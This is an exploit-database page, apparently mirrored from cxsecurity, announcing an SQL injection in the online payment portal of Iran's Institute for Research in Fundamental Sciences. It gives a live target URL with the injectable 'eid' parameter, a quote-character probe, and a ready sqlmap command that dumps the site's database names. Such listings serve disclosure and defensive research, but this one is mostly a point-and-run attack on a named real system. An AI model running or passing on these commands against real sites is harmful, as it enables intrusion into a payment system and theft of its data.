Advertisement






IPM Iran - Institute for Research in Fundamental Sciences SQLi(Online Payment gateway)

CVE Category Price Severity
N/A CWE-89 $1500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2020-04-26
CPE
cpe:cpe:/a:ipm-iran-institute-for-research-in-fundamental-sciences:online_payment_gateway
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020040158

Below is a copy:

IPM Iran - Institute for Research in Fundamental Sciences SQLi(Online Payment gateway)
# Exploit Title:IPM Iran - Institute for Research in Fundamental Sciences SQLi
# Date:  25 Apr 2020                                            
# Author: H.BBF3.4 & A.BBF3.4                                                            
+++++++++++++++++++++++++

ABOUT IPM Iran - Institute for Research in Fundamental Sciences :
The Institute for Research in Fundamental Sciences, previously Institute for Studies in Theoretical Physics and Mathematics, is an advanced public research institute in Tehran, Iran. IPM is directed by Mohammad Javad Larijani, its original founder. Wikipedia(https://en.wikipedia.org/wiki/Institute_for_Research_in_Fundamental_Sciences)

# SQL Injection Exploit :
**********************
event_pay.php?eid=


# Example Vulnerable Sites :
*************************
Online Payment gateway:
[+] https://payment.ipm.ir/portal/event_pay.php?eid=44 
=>      https://payment.ipm.ir/portal/event_pay.php?eid=44%27


SQLMAP:
sqlmap.py -u https://payment.ipm.ir/portal/event_pay.php?eid=44 --dbs

t.me/thebughunter

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum